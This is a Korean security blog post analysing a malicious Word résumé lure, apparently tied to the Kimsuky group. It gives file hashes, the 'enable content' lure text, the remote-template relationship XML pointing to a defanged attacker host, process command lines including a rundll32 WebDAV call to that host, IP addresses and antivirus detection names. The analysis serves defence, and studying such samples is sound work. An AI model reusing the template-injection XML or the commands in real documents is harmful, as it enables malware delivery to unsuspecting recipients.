꿈을꾸는 파랑새

반응형

오늘은 이력서로 위장하는 워드 악성코드인 이랜드_이윤정.docx(2022.09.28)에 대해 알아보겠습니다.
외부에서 악성 매크로를 가져와 실행하는 원격 템플릿 삽입하는 방식으로 악성코드를 유포하고 있으며 악성코드 해쉬값은 다음과 같습니다.
파일명:이랜드_이윤정.docx
사이즈:720 KB
CRC32:10fd4957
MD5:da582d905814a49f6ce5b32a069f0b95
SHA-1:66d6ecc5079173286dfe5cc9db526dc2f425665d
SHA-256:f00fe4e6da3aaad25d1ac8b268ffeebc98bda184e3df224905626908be24d415
먼저 해당 악성코드를 실행을 하면 다음과 같은 화면을 볼수가 있습니다.

이랜드_이윤정.docx 악성코드 실행
이랜드_이윤정.docx 악성코드 실행

해당 악성코드를 실행하면 문서가 보호되었습니다.
내용을 보시려면 다음 조치들을 검토해주세요.
1.Microsoft Office 응용프로그램을 이용하여 문서를 엽니다.
보호된 문서는 온라인 미리보기를 지원하지 않습니다.
2.데스크톱 또는 랩톱에서 문서를 엽니다.
보호된 문서는 모바일 기기에서 제대로 열리지 않을 수 있습니다.
3.문서 상단에서 "편집사용"버튼을 누른후 "콘텐츠 사용"을 눌러 주세요.라고 돼 있으면 여기서 
보안 경고 매크로 사용 할 수 없도록 설정 했습니다.

여기서 보면 이거 어디서 많이 본 것 같은데 하면 생각나는 것은 북한의 해킹 단체 Kimsuky(킴수키)가 자주 사용을 하는 레퍼토리 화면을 볼 수가 있으면 해당 악성코드는 매크로가 포함돼 있지 않습니다.

그리고 C:\Users\사용자\Desktop\이랜드_이윤정\word\_rels 즉 워드 안에 있는 settings.xml.rels를 보면 해당 악성코드에 포함된 주소는 다음과 같습니다.

악성코드 에 포함된 주소
악성코드 에 포함된 주소

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats(.)org/package/2006/relationships">
<Relationship Id="rId1" Type="http://schemas.openxmlformats(.)org/officeDocument/2006/relationships/attachedTemplate" 
Target="http://sunlin(.)org/info/style?title=2201212" TargetMode="External"/></Relationships>

그리고 해당 악성코드는 다음 폴더에 파일을 생성합니다.
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\1QY2RLID.htm
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\59995A28.htm
그리고 악성코드는 다음 명령어를 통해서 인젝션을 실행을 합니다.

HxD로 본 악성코드 에 포함된 주소

C:\Windows\System32\powercfg.exe -energy -auto
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\DllHost.exe/Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
rundll32.exe %windir%\system32\davclnt.dll,DavSetCookie sunlin(.)org
이런 식으로 실행되면 여기서 접속을 시도하는 주소는 다음과 같습니다.
http://sunlin(.)org/info/
http://sunlin(.)org/info/style?title=2201212
http://www.sunlin(.)org/
http://sunlin(.)org/info
http://sunlin(.)org/info/style?title=2201212
입니다.
IP 트래픽은 다음과 같습니다.
180.67.205(.)238:80
180.67.205(.)238:80 (TCP)
52.109.88(.)191:443 (TCP)
이며 2022-10-15 08:41:00 UTC 바이러스토탈(VirusTotal)에서 탐지하는 보안 업체들은 다음과 같습니다.
Ad-Aware:Trojan.GenericKD.62375632
AhnLab-V3:Downloader/XML.Generic
ALYac:Trojan.Downloader.DOC.Gen
Antiy-AVL:Trojan/Generic.ASHMacro.7D6
Avast:Other:Malware-gen [Trj]
AVG:Other:Malware-gen [Trj]
Avira (no cloud):W97M/Dldr.Agent.ugkvh
BitDefender:Trojan.GenericKD.62375632
Comodo:Malware@#2vwknihbhqp3m
eScan:Trojan.GenericKD.62375632
ESET-NOD32:DOC/TrojanDownloader.Agent.ARJ
GData:XML.Trojan.Agent.1T7G0M
Kaspersky:HEUR:Trojan-Downloader.MSOffice.Agent.gen
Kingsoft:Macro.Word.Generic.jm.(kcloud)
Lionic:Trojan.MSOffice.Agent.a!c
MAX:Malware (ai Score=100)
McAfee-GW-Edition:Artemis!Trojan
NANO-Antivirus:Exploit.Xml.CVE-2017-0199.equmby
Symantec:W97M.Downloader
Tencent:Trojan.Win32.Office_Dl.12460116
Trellix (FireEye):Trojan.GenericKD.62375632
VIPRE:Trojan.GenericKD.62375632
VirIT:W97M.Dwnldr.BJS
ViRobot:DOC.Z.Agent.737930
Zoner:Probably Heur.W97OleLink
기본적으로 보안 업체들은 대부분 탐지를 하고 있으며 항상 백신 프로그램을 설치 실시간 업데이트 및 실시간 감시 그리고 사전 방역 시스템 등을 켜두고 컴퓨터를 사용하는 것이 좋으면 항상 기본적인 보안 수칙을 지키는 것이 안전하게 컴퓨터를 사용하는 방법일 것입니다.

 

반응형
그리드형

공유하기

facebook twitter kakaoTalk kakaostory naver band